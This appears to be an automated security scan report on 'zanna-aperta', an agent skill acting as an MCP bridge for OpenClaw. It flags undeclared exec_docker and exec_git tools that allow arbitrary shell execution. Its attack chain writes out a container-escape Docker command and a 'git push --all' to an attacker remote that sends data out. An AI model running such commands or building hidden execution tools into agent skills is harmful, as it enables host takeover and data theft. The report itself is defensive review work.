Scan Report
68 /100
zanna-aperta
MCP Bridge completo per OpenClaw con 45 tool per agenti, workspace, progetti, cron, browser, canvas, nodes, messaging, gateway, Ollama e ClawX
Skill contains undeclared exec_docker and exec_git tools allowing arbitrary shell command execution, plus suspicious 'ragretrevers' directory naming pattern indicative of covert operations.
Do not install this skill
Do not deploy. Remove undeclared exec tools or properly document them with restricted command allowlists. Investigate the 'ragretrevers' directory name origin.
Attack Chain 5 steps
◎
Entry Skill masquerades as MCP bridge for OpenClaw with 45 declared tools
SKILL.md:1⬡
Escalation Attacker discovers undeclared exec_docker/exec_git tools via tools/list
zanna-aperta.py:467⬡
Escalation Attacker executes arbitrary Docker commands (docker run --rm -v /:/host alpine chroot /host sh)
zanna-aperta.py:467⬡
Escalation Attacker uses exec_git to push sensitive data to external repo (git push --all attacker-controlled remote)
zanna-aperta.py:479◉
Impact Full container breakout and data exfiltration via git remote
zanna-aperta.py:479Findings 6 items
| Severity | Finding | Location |
|---|---|---|
| High | Undeclared arbitrary Docker command execution RCE | zanna-aperta.py:467 |
| High | Undeclared arbitrary Git command execution RCE | zanna-aperta.py:479 |
| Medium | SKILL.md missing exec tools declaration Doc Mismatch | SKILL.md:1 |
| Medium | Suspicious directory naming pattern Sensitive Access | zanna-aperta.py:19 |
| Medium | Undeclared subprocess usage throughout Priv Escalation | zanna-aperta.py:64 |
| Low | Unpinned external tool dependencies Supply Chain | zanna-aperta.py:467 |
| Resource | Declared | Inferred | Status | Evidence |
|---|---|---|---|---|
| Filesystem | WRITE | WRITE | ✓ Aligned | workspace_create, project_create write to disk |
| Shell | NONE | WRITE | ✗ Violation | exec_docker (line 467), exec_git (line 479) accept arbitrary commands |
| Network | READ | READ | ✓ Aligned | Ollama API calls to localhost:11434 |
| Skill Invoke | NONE | WRITE | ✗ Violation | sessions_send, cron_add allow arbitrary message injection |
File Tree
2 files · 57.2 KB · 1499 lines Python 1f · 1435L
Markdown 1f · 64L
├─
SKILL.md
Markdown
└─
zanna-aperta.py
Python
Dependencies 4 items
| Package | Version | Source | Known Vulns | Notes |
|---|---|---|---|---|
docker | * | system | No | Binary not pinned, accessed via subprocess |
git | * | system | No | Binary not pinned, accessed via subprocess |
pnpm | * | system | No | Used for ClawX startup via pnpm run dev |
ollama | * | system | No | Optional local AI, called via curl |
Security Positives
✓ Skill follows standard MCP protocol structure
✓ Input validation via inputSchema in tool definitions
✓ Timeout limits on subprocess calls (30-300s)
✓ JSON-RPC error handling present
✓ No base64-encoded payloads or obfuscation detected